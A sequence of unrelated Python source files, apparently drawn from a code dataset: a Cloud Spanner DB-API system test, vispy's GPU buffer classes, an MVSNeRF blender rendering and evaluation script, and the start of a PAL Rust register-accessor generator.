cursor.execute(
"""
INSERT INTO contacts (contact_id, first_name, last_name, email)
VALUES (1, 'first-name', 'last-name', '[email protected]')
"""
)
conn.commit()
cursor.execute(
"""
UPDATE contacts
SET first_name = 'updated-first-name'
WHERE first_name = 'first-name'
"""
)
conn.close()
# connect again, as the previous connection is no-op after closing
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
# read the resulting data from the database
cursor.execute("SELECT * FROM contacts")
got_rows = cursor.fetchall()
conn.commit()
assert got_rows == [want_row]
cursor.close()
conn.close()
def test_results_checksum(shared_instance, dbapi_database):
"""Test that results checksum is calculated properly."""
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO contacts (contact_id, first_name, last_name, email)
VALUES
(1, 'first-name', 'last-name', '[email protected]'),
(2, 'first-name2', 'last-name2', '[email protected]')
"""
)
assert len(conn._statements) == 1
conn.commit()
cursor.execute("SELECT * FROM contacts")
got_rows = cursor.fetchall()
assert len(conn._statements) == 1
conn.commit()
checksum = hashlib.sha256()
checksum.update(pickle.dumps(got_rows[0]))
checksum.update(pickle.dumps(got_rows[1]))
assert cursor._checksum.checksum.digest() == checksum.digest()
def test_execute_many(shared_instance, dbapi_database):
# connect to the test database
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
row_data = [
(1, "first-name", "last-name", "[email protected]"),
(2, "first-name2", "last-name2", "[email protected]"),
]
cursor.executemany(
"""
INSERT INTO contacts (contact_id, first_name, last_name, email)
VALUES (%s, %s, %s, %s)
""",
row_data,
)
conn.commit()
cursor.executemany(
"""SELECT * FROM contacts WHERE contact_id = @a1""", ({"a1": 1}, {"a1": 2}),
)
res = cursor.fetchall()
conn.commit()
assert len(res) == len(row_data)
for found, expected in zip(res, row_data):
assert found[0] == expected[0]
# checking that execute() and executemany()
# results are not mixed together
cursor.execute(
"""
SELECT * FROM contacts WHERE contact_id = 1
""",
)
res = cursor.fetchone()
conn.commit()
assert res[0] == 1
conn.close()
def test_DDL_autocommit(shared_instance, dbapi_database):
"""Check that DDLs in autocommit mode are immediately executed."""
conn = Connection(shared_instance, dbapi_database)
conn.autocommit = True
cur = conn.cursor()
cur.execute(
"""
CREATE TABLE Singers (
SingerId INT64 NOT NULL,
Name STRING(1024),
) PRIMARY KEY (SingerId)
"""
)
conn.close()
# if previous DDL wasn't committed, the next DROP TABLE
# statement will fail with a ProgrammingError
conn = Connection(shared_instance, dbapi_database)
cur = conn.cursor()
cur.execute("DROP TABLE Singers")
conn.commit()
def test_DDL_commit(shared_instance, dbapi_database):
"""Check that DDLs in commit mode are executed on calling `commit()`."""
conn = Connection(shared_instance, dbapi_database)
cur = conn.cursor()
cur.execute(
"""
CREATE TABLE Singers (
SingerId INT64 NOT NULL,
Name STRING(1024),
) PRIMARY KEY (SingerId)
"""
)
conn.commit()
conn.close()
# if previous DDL wasn't committed, the next DROP TABLE
# statement will fail with a ProgrammingError
conn = Connection(shared_instance, dbapi_database)
cur = conn.cursor()
cur.execute("DROP TABLE Singers")
conn.commit()
def test_ping(shared_instance, dbapi_database):
"""Check connection validation method."""
conn = Connection(shared_instance, dbapi_database)
conn.validate()
conn.close()
def test_update_non_autocommit(shared_instance, dbapi_database):
setup_rows = """
INSERT INTO contacts (contact_id, first_name, last_name, email)
VALUES
(1, 'first-name', 'last-name', '[email protected]'),
(2, 'first-name', 'last-name', '[email protected]'),
(3, 'first-name', 'last-name', '[email protected]')
"""
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
cursor.execute(setup_rows)
conn.commit()
cursor.execute(
"UPDATE contacts SET first_name='changed' WHERE email='[email protected]'"
)
conn.commit()
assert cursor.rowcount == 2
| 26.071053 | 84 | 0.66559 | [
"Apache-2.0"
] | jpburbank/python-spanner | tests/system/test_dbapi.py | 9,907 | Python |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2015, Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
import numpy as np
from os import path as op
from traceback import extract_stack, format_list
import weakref
from . globject import GLObject
from ..util import logger
from ..ext.six import string_types
# ------------------------------------------------------------ Buffer class ---
class Buffer(GLObject):
""" Generic GPU buffer.
A generic buffer is an interface used to upload data to a GPU array buffer
(ARRAY_BUFFER or ELEMENT_ARRAY_BUFFER). It keeps track of
buffer size but does not have any CPU storage. You can consider it as
write-only.
The `set_data` is a deferred operation: you can call it even if an OpenGL
context is not available. The `update` function is responsible to upload
pending data to GPU memory and requires an active GL context.
The Buffer class only deals with data in terms of bytes; it is not
aware of data type or element size.
Parameters
----------
data : ndarray | None
Buffer data.
nbytes : int | None
Buffer byte size.
"""
def __init__(self, data=None, nbytes=None):
GLObject.__init__(self)
self._views = [] # Views on this buffer (stored using weakrefs)
self._valid = True # To invalidate buffer views
self._nbytes = 0 # Bytesize in bytes, set in resize_bytes()
# Set data
if data is not None:
if nbytes is not None:
raise ValueError("Cannot specify both data and nbytes.")
self.set_data(data, copy=False)
elif nbytes is not None:
self.resize_bytes(nbytes)
@property
def nbytes(self):
""" Buffer size in bytes """
return self._nbytes
def set_subdata(self, data, offset=0, copy=False):
""" Set a sub-region of the buffer (deferred operation).
Parameters
----------
data : ndarray
Data to be uploaded
offset: int
Offset in buffer where to start copying data (in bytes)
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
"""
data = np.array(data, copy=copy)
nbytes = data.nbytes
if offset < 0:
raise ValueError("Offset must be positive")
elif (offset + nbytes) > self._nbytes:
raise ValueError("Data does not fit into buffer")
# If the whole buffer is to be written, we clear any pending data
# (because they will be overwritten anyway)
if nbytes == self._nbytes and offset == 0:
self._glir.command('SIZE', self._id, nbytes)
self._glir.command('DATA', self._id, offset, data)
def set_data(self, data, copy=False):
""" Set data in the buffer (deferred operation).
This completely resets the size and contents of the buffer.
Parameters
----------
data : ndarray
Data to be uploaded
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
"""
data = np.array(data, copy=copy)
nbytes = data.nbytes
if nbytes != self._nbytes:
self.resize_bytes(nbytes)
else:
# Use SIZE to discard any previous data setting
self._glir.command('SIZE', self._id, nbytes)
if nbytes: # Only set data if there *is* data
self._glir.command('DATA', self._id, 0, data)
def resize_bytes(self, size):
""" Resize this buffer (deferred operation).
Parameters
----------
size : int
New buffer size in bytes.
"""
self._nbytes = size
self._glir.command('SIZE', self._id, size)
# Invalidate any view on this buffer
for view in self._views:
if view() is not None:
view()._valid = False
self._views = []
# -------------------------------------------------------- DataBuffer class ---
class DataBuffer(Buffer):
""" GPU data buffer that is aware of data type and elements size
Parameters
----------
data : ndarray | None
Buffer data.
"""
def __init__(self, data=None):
self._size = 0 # number of elements in buffer, set in resize_bytes()
self._dtype = None
self._stride = 0
self._itemsize = 0
self._last_dim = None
Buffer.__init__(self, data)
def _prepare_data(self, data):
# Can be overrriden by subclasses
if not isinstance(data, np.ndarray):
raise TypeError("DataBuffer data must be numpy array.")
return data
def set_subdata(self, data, offset=0, copy=False, **kwargs):
""" Set a sub-region of the buffer (deferred operation).
Parameters
----------
data : ndarray
Data to be uploaded
offset: int
Offset in buffer where to start copying data (in bytes)
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
**kwargs : dict
Additional keyword arguments.
"""
data = self._prepare_data(data, **kwargs)
offset = offset * self.itemsize
Buffer.set_subdata(self, data=data, offset=offset, copy=copy)
def set_data(self, data, copy=False, **kwargs):
""" Set data (deferred operation)
Parameters
----------
data : ndarray
Data to be uploaded
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
**kwargs : dict
Additional arguments.
"""
data = self._prepare_data(data, **kwargs)
self._dtype = data.dtype
self._stride = data.strides[-1]
self._itemsize = self._dtype.itemsize
Buffer.set_data(self, data=data, copy=copy)
@property
def dtype(self):
""" Buffer dtype """
return self._dtype
@property
def offset(self):
""" Buffer offset (in bytes) relative to base """
return 0
@property
def stride(self):
""" Stride of data in memory """
return self._stride
@property
def size(self):
""" Number of elements in the buffer """
return self._size
@property
def itemsize(self):
""" The total number of bytes required to store the array data """
return self._itemsize
@property
def glsl_type(self):
""" GLSL declaration strings required for a variable to hold this data.
"""
if self.dtype is None:
return None
dtshape = self.dtype[0].shape
n = dtshape[0] if dtshape else 1
if n > 1:
dtype = 'vec%d' % n
else:
dtype = 'float' if 'f' in self.dtype[0].base.kind else 'int'
return 'attribute', dtype
def resize_bytes(self, size):
""" Resize the buffer (in-place, deferred operation)
Parameters
----------
size : integer
New buffer size in bytes
Notes
-----
This clears any pending operations.
"""
Buffer.resize_bytes(self, size)
self._size = size // self.itemsize
def __getitem__(self, key):
""" Create a view on this buffer. """
view = DataBufferView(self, key)
self._views.append(weakref.ref(view))
return view
def __setitem__(self, key, data):
""" Set data (deferred operation) """
# Setting a whole field of the buffer: only allowed if we have CPU
# storage. Note this case (key is string) only happen with base buffer
if isinstance(key, string_types):
raise ValueError("Cannot set non-contiguous data on buffer")
# Setting one or several elements
elif isinstance(key, int):
if key < 0:
key += self.size
if key < 0 or key > self.size:
raise IndexError("Buffer assignment index out of range")
start, stop, step = key, key + 1, 1
elif isinstance(key, slice):
start, stop, step = key.indices(self.size)
if stop < start:
start, stop = stop, start
elif key == Ellipsis:
start, stop, step = 0, self.size, 1
else:
raise TypeError("Buffer indices must be integers or strings")
# Contiguous update?
if step != 1:
raise ValueError("Cannot set non-contiguous data on buffer")
# Make sure data is an array
if not isinstance(data, np.ndarray):
data = np.array(data, dtype=self.dtype, copy=False)
# Make sure data is big enough
if data.size < stop - start:
data = np.resize(data, stop - start)
elif data.size > stop - start:
raise ValueError('Data too big to fit GPU data.')
# Set data
offset = start # * self.itemsize
self.set_subdata(data=data, offset=offset, copy=True)
def __repr__(self):
return ("<%s size=%s last_dim=%s>" %
(self.__class__.__name__, self.size, self._last_dim))
class DataBufferView(DataBuffer):
""" View on a sub-region of a DataBuffer.
Parameters
----------
base : DataBuffer
The buffer accessed by this view.
key : str, int, slice, or Ellpsis
The index into the base buffer that defines a sub-region of the buffer
to view. String arguments select a single field from multi-field
dtypes, and other allowed types select a subset of rows.
Notes
-----
It is generally not necessary to instantiate this class manually; use
``base_buffer[key]`` instead.
"""
# Note that this class is a bit evil: it is a subclass of GLObject,
# Buffer and DataBuffer, but any of these __init__'s are not called ...
def __init__(self, base, key):
# Note how this never runs the super's __init__,
# all attributes must thus be set here ...
self._base = base
self._key = key
self._stride = base.stride
if isinstance(key, string_types):
self._dtype = base.dtype[key]
self._offset = base.dtype.fields[key][1]
self._nbytes = base.size * self._dtype.itemsize
self._size = base.size
self._itemsize = self._dtype.itemsize
return
if isinstance(key, int):
if key < 0:
key += base.size
if key < 0 or key > base.size:
raise IndexError("Buffer assignment index out of range")
start, stop, step = key, key + 1, 1
elif isinstance(key, slice):
start, stop, step = key.indices(base.size)
if stop < start:
start, stop = stop, start
elif key == Ellipsis:
start, stop, step = 0, base.size, 1
else:
raise TypeError("Buffer indices must be integers or strings")
if step != 1:
raise ValueError("Cannot access non-contiguous data")
self._itemsize = base.itemsize
self._offset = start * self.itemsize
self._size = stop - start
self._dtype = base.dtype
self._nbytes = self.size * self.itemsize
@property
def glir(self):
return self._base.glir
@property
def id(self):
return self._base.id
@property
def _last_dim(self):
return self._base._last_dim
def set_subdata(self, data, offset=0, copy=False, **kwargs):
raise RuntimeError("Cannot set data on buffer view.")
def set_data(self, data, copy=False, **kwargs):
raise RuntimeError("Cannot set data on buffer view.")
@property
def offset(self):
""" Buffer offset (in bytes) relative to base """
return self._offset
@property
def base(self):
"""Buffer base if this buffer is a view on another buffer. """
return self._base
def resize_bytes(self, size):
raise RuntimeError("Cannot resize buffer view.")
def __getitem__(self, key):
raise RuntimeError("Can only access data from a base buffer")
def __setitem__(self, key, data):
raise RuntimeError("Cannot set data on Buffer view")
def __repr__(self):
return ("<DataBufferView on %r at offset=%d size=%d>" %
(self.base, self.offset, self.size))
# ------------------------------------------------------ VertexBuffer class ---
class VertexBuffer(DataBuffer):
""" Buffer for vertex attribute data
Parameters
----------
data : ndarray
Buffer data (optional)
"""
_GLIR_TYPE = 'VertexBuffer'
def _prepare_data(self, data, convert=False):
# Build a structured view of the data if:
# -> it is not already a structured array
# -> shape if 1-D or last dimension is 1,2,3 or 4
if isinstance(data, list):
data = np.array(data, dtype=np.float32)
if not isinstance(data, np.ndarray):
raise ValueError('Data must be a ndarray (got %s)' % type(data))
if data.dtype.isbuiltin:
if convert is True:
data = data.astype(np.float32)
if data.dtype in (np.float64, np.int64):
raise TypeError('data must be 32-bit not %s'
% data.dtype)
c = data.shape[-1] if data.ndim > 1 else 1
if c in [2, 3, 4]:
if not data.flags['C_CONTIGUOUS']:
logger.warning('Copying discontiguous data for struct '
'dtype:\n%s' % _last_stack_str())
data = data.copy()
else:
c = 1
if self._last_dim and c != self._last_dim:
raise ValueError('Last dimension should be %s not %s'
% (self._last_dim, c))
data = data.view(dtype=[('f0', data.dtype.base, c)])
self._last_dim = c
return data
def _last_stack_str():
"""Print stack trace from call that didn't originate from here"""
stack = extract_stack()
for s in stack[::-1]:
if op.join('vispy', 'gloo', 'buffer.py') not in __file__:
break
return format_list([s])[0]
# ------------------------------------------------------- IndexBuffer class ---
class IndexBuffer(DataBuffer):
""" Buffer for index data
Parameters
----------
data : ndarray | None
Buffer data.
"""
_GLIR_TYPE = 'IndexBuffer'
def __init__(self, data=None):
DataBuffer.__init__(self, data)
self._last_dim = 1
def _prepare_data(self, data, convert=False):
if isinstance(data, list):
data = np.array(data, dtype=np.uint32)
if not isinstance(data, np.ndarray):
raise ValueError('Data must be a ndarray (got %s)' % type(data))
if not data.dtype.isbuiltin:
raise TypeError("Element buffer dtype cannot be structured")
else:
if convert:
if data.dtype is not np.uint32:
data = data.astype(np.uint32)
else:
if data.dtype not in [np.uint32, np.uint16, np.uint8]:
raise TypeError("Invalid dtype for IndexBuffer: %r" %
data.dtype)
return data
| 32.651303 | 79 | 0.560302 | [
"BSD-3-Clause"
] | CVandML/vispy | vispy/gloo/buffer.py | 16,293 | Python |
import argparse
import re
####
# # Box 1
####
import sys,os,imageio,lpips
root = '/home/youngsun/documents/mvs/mvsnerf_timing'
os.chdir(root)
sys.path.append(root)
from opt_src import config_parser
from data import dataset_dict
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
# models
from models_src import *
from renderer_src import *
from data.ray_utils import get_rays
from tqdm import tqdm
from skimage.metrics import structural_similarity
# pytorch-lightning
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning import LightningModule, Trainer, loggers
from data.ray_utils import ray_marcher
import torch
torch.cuda.set_device(0)
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
####
# # Box 2
####
def decode_batch(batch):
rays = batch['rays'] # (B, 8)
rgbs = batch['rgbs'] # (B, 3)
return rays, rgbs
def unpreprocess(data, shape=(1,1,3,1,1)):
# to unnormalize image for visualization
# data N V C H W
device = data.device
mean = torch.tensor([-0.485 / 0.229, -0.456 / 0.224, -0.406 / 0.225]).view(*shape).to(device)
std = torch.tensor([1 / 0.229, 1 / 0.224, 1 / 0.225]).view(*shape).to(device)
return (data - mean) / std
def read_depth(filename):
depth_h = np.array(read_pfm(filename)[0], dtype=np.float32) # (800, 800)
depth_h = cv2.resize(depth_h, None, fx=0.5, fy=0.5,
interpolation=cv2.INTER_NEAREST) # (600, 800)
depth_h = depth_h[44:556, 80:720] # (512, 640)
# depth = cv2.resize(depth_h, None, fx=0.5, fy=0.5,interpolation=cv2.INTER_NEAREST)#!!!!!!!!!!!!!!!!!!!!!!!!!
mask = depth>0
return depth_h,mask
loss_fn_vgg = lpips.LPIPS(net='vgg')
mse2psnr = lambda x : -10. * np.log(x) / np.log(10.)
####
# # Box 3
####
# create function for returning dense, sparse, far views
def get_source_imgs(source_dataset, target_position, N_views, device, view_type='nearest',
fixed_idxs=None,
is_source_target_overlap=False):
pair_idx = get_pair_idx(source_dataset, target_position, N_views, view_type, fixed_idxs, is_source_target_overlap)
imgs_source, proj_mats, near_far_source, pose_source = source_dataset.read_source_views(pair_idx=pair_idx,device=device)
return imgs_source, proj_mats, near_far_source, pose_source
def get_pair_idx(source_dataset, target_position, N_views, view_type='nearest',
fixed_idxs=None,
is_source_target_overlap=False):
positions = source_dataset.poses[:,:3,3]
dis = np.sum(np.abs(positions - target_position), axis=-1)
dis_sort = np.argsort(dis)
if is_source_target_overlap:
dis_sort = dis_sort[1:]
if view_type == 'nearest': # or "as dense as possible ㅎㅎ"
pair_idx = dis_sort[:N_views]
pair_idx = [source_dataset.img_idx[item] for item in pair_idx]
if view_type == 'dense':
idxs = torch.randperm(int(np.rint(N_views*1.5)))[:N_views].sort()[0]
pair_idx = dis_sort[idxs]
pair_idx = [source_dataset.img_idx[item] for item in pair_idx]
if view_type == 'random': # i know its unnecessarily long...
idxs = torch.randperm(len(dis_sort))[:N_views]
pair_idx = dis_sort[idxs]
pair_idx = [source_dataset.img_idx[item] for item in pair_idx]
if view_type == 'sparse':
idxs = torch.linspace(0, len(dis_sort), steps=N_views+1).round()
idxs = [np.random.choice(range(int(idxs[i]), int(idxs[i+1]))) for i in range(len(idxs)-1)]
pair_idx = dis_sort[idxs]
pair_idx = [source_dataset.img_idx[item] for item in pair_idx]
if view_type == 'far':
idxs = torch.randperm(int(np.rint(N_views*1.5)))[:N_views].sort(descending=True)[0]
pair_idx = dis_sort[::-1][idxs]
pair_idx = [source_dataset.img_idx[item] for item in pair_idx]
if view_type == 'farthest':
pair_idx = dis_sort[::-1][:N_views]
pair_idx = [source_dataset.img_idx[item] for item in pair_idx]
# return index for the case of 'fixed'
if view_type == 'fixed':
pair_idx = fixed_idxs
return pair_idx
####
# # Box 4
####
def render_blender(view_type='nearest',
scenes=['ficus'],
num_src_views=3,
ckpt='base-3src-dense.tar',
source_split='train',
target_split='val',
select_index=None,
is_fixed=False,
is_source_target_overlap=False
):
psnr_all,ssim_all,LPIPS_vgg_all = [],[],[]
# for i_scene, scene in enumerate(['ship','mic','chair','lego','drums','ficus','materials','hotdog']):#
for i_scene, scene in enumerate(scenes):#
psnr,ssim,LPIPS_vgg = [],[],[]
cmd = f'--datadir /mnt/hdd/mvsnerf_data/nerf_synthetic/{scene} \
--dataset_name blender_src --white_bkgd \
--net_type v0 --ckpt ./ckpts/{ckpt} --num_src_views {num_src_views}'
save_dir = f'/mnt/hdd/youngsun/mvsnerf_timing/results/{ckpt[:-4]}/blender-{num_src_views}-'
if is_fixed:
save_dir += 'fixed-'
save_dir += f'{view_type}-'
save_dir += f'{source_split}-{target_split}/{scene}'
args = config_parser(cmd.split())
args.use_viewdirs = True
args.N_samples = 128
# args.feat_dim = 8+12
args.feat_dim = 8+4*num_src_views
# create models
if 0==i_scene:
render_kwargs_train, render_kwargs_test, start, grad_vars = create_nerf_mvs(args, use_mvs=True, dir_embedder=False, pts_embedder=True)
filter_keys(render_kwargs_train)
MVSNet = render_kwargs_train['network_mvs']
render_kwargs_train.pop('network_mvs')
datadir = args.datadir
datatype = 'train'
pad = 16
args.chunk = 5120
print('============> rendering dataset <===================')
dataset_source = dataset_dict[args.dataset_name](args, split=source_split)
dataset_target = dataset_dict[args.dataset_name](args, split=target_split, select_index=select_index)
target_idx = dataset_target.img_idx
save_as_image = True
os.makedirs(save_dir, exist_ok=True)
MVSNet.train()
MVSNet = MVSNet.cuda()
with torch.no_grad():
try:
tqdm._instances.clear()
except Exception:
pass
for i, batch in enumerate(tqdm(dataset_target)):
torch.cuda.empty_cache()
rays, img = decode_batch(batch)
rays = rays.squeeze().to(device) # (H*W, 3)
img = img.squeeze().cpu().numpy() # (H, W, 3)
if is_fixed:
if i == 0:
if select_index is not None:
pair_idx = get_pair_idx(source_dataset=dataset_source,
target_position=dataset_target.poses[[len(select_index)//2],:3,3],
N_views=args.num_src_views,
view_type=view_type)
else:
pair_idx = get_pair_idx(source_dataset=dataset_source,
target_position=dataset_target.poses[[50],:3,3],
N_views=args.num_src_views,
view_type=view_type)
imgs_source, proj_mats, near_far_source, pose_source = dataset_source.read_source_views(pair_idx=pair_idx,
device=device)
else:
# created fixed image_source
imgs_source, proj_mats, near_far_source, pose_source = get_source_imgs(source_dataset=dataset_source,
target_position=dataset_target.poses[[i],:3,3],
N_views=args.num_src_views, device=device,
view_type=view_type)
volume_feature, _, _ = MVSNet(imgs_source, proj_mats, near_far_source, pad=pad)
imgs_source = unpreprocess(imgs_source)
N_rays_all = rays.shape[0]
rgb_rays, depth_rays_preds = [],[]
for chunk_idx in range(N_rays_all//args.chunk + int(N_rays_all%args.chunk>0)):
xyz_coarse_sampled, rays_o, rays_d, z_vals = ray_marcher(rays[chunk_idx*args.chunk:(chunk_idx+1)*args.chunk],
N_samples=args.N_samples)
# Converting world coordinate to ndc coordinate
H, W = img.shape[:2]
inv_scale = torch.tensor([W - 1, H - 1]).to(device)
w2c_ref, intrinsic_ref = pose_source['w2cs'][0], pose_source['intrinsics'][0].clone()
intrinsic_ref[:2] *= args.imgScale_test/args.imgScale_train
xyz_NDC = get_ndc_coordinate(w2c_ref, intrinsic_ref, xyz_coarse_sampled, inv_scale,
near=near_far_source[0], far=near_far_source[1], pad=pad*args.imgScale_test)
# rendering
rgb, disp, acc, depth_pred, alpha, extras = rendering(args, pose_source, xyz_coarse_sampled,
xyz_NDC, z_vals, rays_o, rays_d,
volume_feature,imgs_source, **render_kwargs_train)
rgb, depth_pred = torch.clamp(rgb.cpu(),0,1.0).numpy(), depth_pred.cpu().numpy()
rgb_rays.append(rgb)
depth_rays_preds.append(depth_pred)
depth_rays_preds = np.concatenate(depth_rays_preds).reshape(H, W)
depth_rays_preds, _ = visualize_depth_numpy(depth_rays_preds, near_far_source)
rgb_rays = np.concatenate(rgb_rays).reshape(H, W, 3)
img_vis = np.concatenate((img*255,rgb_rays*255,depth_rays_preds),axis=1)
img_vis = np.concatenate((torch.cat(torch.split(imgs_source*255, [1]*num_src_views, dim=1),-1).squeeze().permute(1,2,0).cpu().numpy(),img_vis),axis=1)
if save_as_image:
imageio.imwrite(f'{save_dir}/{scene}_{target_idx[i]:03d}.png', img_vis.astype('uint8'))
else:
rgbs.append(img_vis.astype('uint8'))
# quantity
# center crop 0.8 ratio
H_crop, W_crop = np.array(rgb_rays.shape[:2])//10
img = img[H_crop:-H_crop,W_crop:-W_crop]
rgb_rays = rgb_rays[H_crop:-H_crop,W_crop:-W_crop]
psnr.append( mse2psnr(np.mean((rgb_rays-img)**2)))
ssim.append( structural_similarity(rgb_rays, img, multichannel=True))
img_tensor = torch.from_numpy(rgb_rays)[None].permute(0,3,1,2).float()*2-1.0 # image should be RGB, IMPORTANT: normalized to [-1,1]
img_gt_tensor = torch.from_numpy(img)[None].permute(0,3,1,2).float()*2-1.0
LPIPS_vgg.append( loss_fn_vgg(img_tensor, img_gt_tensor).item())
print(f'=====> scene: {scene} mean psnr {np.mean(psnr)} ssim: {np.mean(ssim)} lpips: {np.mean(LPIPS_vgg)}')
psnr_all.append(psnr);ssim_all.append(ssim);LPIPS_vgg_all.append(LPIPS_vgg)
if not save_as_image:
imageio.mimwrite(f'{save_dir}/{scene}_spiral.mp4', np.stack(rgbs), fps=20, quality=10)
print(f'=====> all mean psnr {np.mean(psnr_all)} ssim: {np.mean(ssim_all)} lpips: {np.mean(LPIPS_vgg_all)}')
####
# # Box 5
####
def render_blender_all_settings(scenes=['lego'], num_src_views=3, ckpt='base-3src-dense.tar',source_split='train', target_split='val', select_index=[30,60,90], view_types=[1]):
if 1 in view_types:
render_blender('nearest', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=None)
if 2 in view_types:
render_blender('dense', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=None)
if 3 in view_types:
render_blender('sparse', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=None)
if 4 in view_types:
render_blender('far', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=None)
if 5 in view_types:
render_blender('random', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=None)
if 6 in view_types:
render_blender('nearest', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=True)
if 7 in view_types:
render_blender('sparse', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=True)
if 8 in view_types:
render_blender('nearest', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=None, is_source_target_overlap=True)
if 9 in view_types:
render_blender('sparse', scenes, num_src_views, ckpt, source_split, target_split, select_index, is_fixed=None, is_source_target_overlap=True)
return None
####
# # Box 6
####
####
# # Box 7
####
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--view_types', nargs="+", type=int,
help= 'Enter list of view types to render:' \
' 1 - nearest, 2 - dense, 3 - sparse, 4 - far, 5 - random, ' \
'6 - fixed nearset, 7 - fixed sparse, 8 - unseen nearest, 9 - unseen sparse')
parser.add_argument('--view_indexes', nargs="+", type=int, const=None, default=None,
help= 'default - all views (100)')
parser.add_argument('--scenes', nargs='+', default=[])
parser.add_argument('--ckpts', nargs='+', default=[])
parser.add_argument('--source', type=str, default='train')
parser.add_argument('--target', type=str, default='val')
args = parser.parse_args()
for ckpt in args.ckpts:
num_src_views = int(re.findall('[0-9]+', ckpt)[0])
render_blender_all_settings(scenes=args.scenes,
num_src_views=num_src_views,
ckpt=ckpt,
source_split=args.source,
target_split=args.target,
select_index=args.view_indexes,
view_types=args.view_types)
torch.cuda.empty_cache() | 39.919481 | 176 | 0.569133 | [
"MIT"
] | laphisboy/mvsnerf | renderer_blender_src.py | 15,373 | Python |
import os
import pathlib
from pal.generator.abstract_generator import AbstractGenerator
from pal.logger import logger
from pal.exception import PalGeneratorException
from pal.filter import filters
from pal.transform import transforms
class RustGenerator(AbstractGenerator):
def generate_registers(self, regs, outpath):
try:
regs = transforms["remove_reserved_0"].transform(regs)
regs = transforms["remove_reserved_1"].transform(regs)
regs = transforms["remove_reserved_sign_extended"].transform(regs)
regs = transforms["remove_implementation_defined"].transform(regs)
regs = transforms["special_to_underscore"].transform(regs)
regs = transforms["insert_valid_first_character"].transform(regs)
regs = transforms["remove_redundant_am"].transform(regs)
regs = transforms["remove_redundant_fields"].transform(regs)
regs = transforms["unique_fieldset_names"].transform(regs)
regs = filters["no_access_mechanism"].filter_exclusive(regs)
regs = filters["irregular_size"].filter_exclusive(regs)
logger.info("Generating Rust register accessors to: " + str(outpath))
for reg in regs:
outfile_path = os.path.join(outpath, reg.name.lower() + ".rs")
outfile_path = os.path.abspath(outfile_path)
with open(outfile_path, "w") as outfile:
self._generate_register(outfile, reg)
self.__update_module_files(outpath)
self.__update_lib_file(outpath)
except Exception as e:
msg = "{g} failed to generate output {out}: {exception}".format(
g=str(type(self).__name__),
out=outpath,
exception=e)
raise PalGeneratorException(msg)
def generate_instructions(self, instructions, outpath):
try:
logger.info("Generating Rust instruction accessors to: " + str(outpath))
for inst in instructions:
outfile_path = os.path.join(outpath, inst.name.lower() + ".rs")
outfile_path = os.path.abspath(outfile_path)
with open(outfile_path, "w") as outfile:
self._generate_instruction(outfile, inst)
self.__update_module_files(outpath)
self.__update_lib_file(outpath)
except Exception as e:
msg = "{g} failed to generate output {out}: {exception}".format(
g=str(type(self).__name__),
out=outpath,
exception=e)
raise PalGeneratorException(msg)
def _generate_register(self, outfile, reg):
self.writer.declare_register_dependencies(outfile, reg, self.config)
if self.config.enable_printers == True:
self.writer.declare_print_mechanism_dependencies(outfile, reg)
for am_key, am_list in reg.access_mechanisms.items():
for am in am_list:
self.writer.declare_access_mechanism_dependencies(outfile, reg, am)
self.writer.write_newline(outfile)
self._generate_register_comment(outfile, reg)
self.writer.declare_register_accessors(outfile, reg)
for idx, fieldset in enumerate(reg.fieldsets):
if fieldset.condition:
self.writer.declare_comment(outfile, fieldset.condition, 79)
for field in fieldset.fields:
self.writer.declare_field_accessors(outfile, reg, field)
if self.config.enable_printers == True:
self.writer.declare_field_printers(outfile, reg, field)
if reg.is_readable() and self.config.enable_printers == True:
self.writer.declare_fieldset_printers(outfile, reg, fieldset)
def _generate_instruction(self, outfile, inst):
self.writer.declare_instruction_dependencies(outfile, inst, self.config)
self.writer.declare_instruction_accessor(outfile, inst)
self.writer.write_newline(outfile)
def _generate_register_comment(self, outfile, reg):
comment = "{name} ({long_name}){separator}{purpose}".format(
name=str(reg.name),
long_name=str(reg.long_name),
separator=" - " if reg.purpose else "",
purpose=str(reg.purpose)
)
self.writer.declare_comment(outfile, comment, 75)
def __update_module_files(self, outpath):
modfile_path = os.path.join(outpath, "mod.rs")
modfile_path = os.path.abspath(modfile_path)
for root, dirs, files in os.walk(outpath):
logger.info("Updating modfile: " + os.path.join(root, "mod.rs"))
with open(os.path.join(root, "mod.rs"), "w") as modfile:
for name in sorted(files):
if name != "mod.rs" and name.endswith(".rs"):
modname = os.path.splitext(name)[0]
modfile.write("pub mod " + modname + ";")
self.writer.write_newline(modfile)
modfile.write("pub use " + modname + "::*;")
self.writer.write_newline(modfile)
for name in sorted(dirs):
modname = os.path.splitext(name)[0]
modfile.write("pub mod " + modname + ";")
self.writer.write_newline(modfile)
modfile.write("pub use " + modname + "::*;")
self.writer.write_newline(modfile)
def __update_lib_file(self, outpath):
libfile_path = os.path.abspath(os.path.join(outpath, "lib.rs"))
libfile_dir = os.path.abspath(outpath)
if not os.path.exists(libfile_path):
libfile_path = os.path.abspath(os.path.join(outpath, "../lib.rs"))
libfile_dir = os.path.abspath(os.path.join(outpath, "../"))
